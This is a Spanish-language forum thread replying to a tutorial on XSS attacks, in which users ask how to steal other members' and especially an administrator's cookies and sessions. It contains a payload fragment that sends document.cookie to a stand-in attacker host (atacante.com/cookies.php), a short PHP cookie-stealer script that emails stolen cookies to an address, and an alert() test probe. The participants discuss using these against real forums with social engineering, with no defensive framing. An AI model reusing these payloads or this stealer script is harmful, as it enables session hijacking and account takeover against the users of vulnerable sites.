[::Tutorial::] - Ataques XSS

[Ch@CaL]

Muy buen manual man xo tengo una duda,yo entro x ejemplo en el foro,xa ello me he de registrar x lo tanto he de ser usuario xa poder colocar la url entonces al ser usuiario xa que quiero saber el pass de otro user me interesaria saber la del admin mejor no?ahi supongo que entra a formar parte la ingenieria social.Me apareceran en el text todas las cookies de todos los que lo pinxen?

[|Azrack|]

y si yo le paaso solo el enlace:

Código [Seleccionar] Expandir

http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>
no serviria xq para robar la cookie la redirecion tiene q' ser desde la web vulnerable?

[security]

<script>alert()</script>

[Dr. Stephen Falken]

A día de hoy esta vulnerabilidad está casi capada. No?

[NaphacK]

A día de hoy esta vulnerabilidad está casi capada. No?

No, aun se siguen encontrando vulnerables...
Aunque tengo una duda...
Que pasa si la pagina me dio acceso a unos archivos tipo ftp, lo que pasa es que me queda de una forma asi:
www.webvulnerable.com/free-press/unaslibrerias   por esas librerias puedo navegar tranquilamente, y son scripts en java y php...
Osea, aunque no sea un boton buscar, puedo ejecutar igual la url maligna?
Saludos...

[merinodaniel]

hola a toos, justo he estado investigando XSS, y encontre q tb se puede hacer q se envie la cookie a un mail...

Código [Seleccionar] Expandir

<?php
     $cookie = $_GET["cookie"];
     mail("admin@gensale.net", "Cookie stealer report", $cookie);
?>

este codigo seria para la pag: cookie.php
Este codigo fue publicado en el blog: blog.gensale.net
Yo no soy el autor..
byes